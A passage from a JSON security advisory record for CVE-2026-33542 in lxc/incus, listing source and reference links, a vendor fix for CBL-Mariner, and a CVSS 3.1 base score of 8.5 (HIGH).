"https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33542" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33542.json" }, { "category": "external", "summary": "Source - debian", "url": "https://security-tracker.debian.org/tracker/CVE-2026-33542" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33542.json" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-p8mm-23gg-jc9r.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-p8mm-23gg-jc9r" }, { "category": "external", "summary": "Source - microsoft", "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/lxc/incus/security/advisories/GHSA-p8mm-23gg-jc9r" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33542" }, { "category": "external", "summary": "Reference - github; osv; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33542" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/lxc/incus/commit/04e97418189f743411884afb81a3384e6218b8cd" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/lxc/incus/commit/4a80447c52d6bc05d3322feeb5395f581e7a80e4" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/lxc/incus/commit/72688b7d9400c8f3c17ad0f93a7c1aeb89627307" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/lxc/incus/commit/ee26f72524ab60a4abcfd4e52667c52bb24364fc" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/lxc/incus/releases/tag/v6.23.0" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-p8mm-23gg-jc9r" } ], "remediations": [ { "category": "vendor_fix", "details": "CBL-Mariner Releases", "product_ids": [ "CSAFPID-5956312", "CSAFPID-5956314" ] } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5919453", "CSAFPID-5944290", "CSAFPID-5956312", "CSAFPID-5956314", "CSAFPID-5965579" ] } ], "title": "CVE-2026-33542" } ] }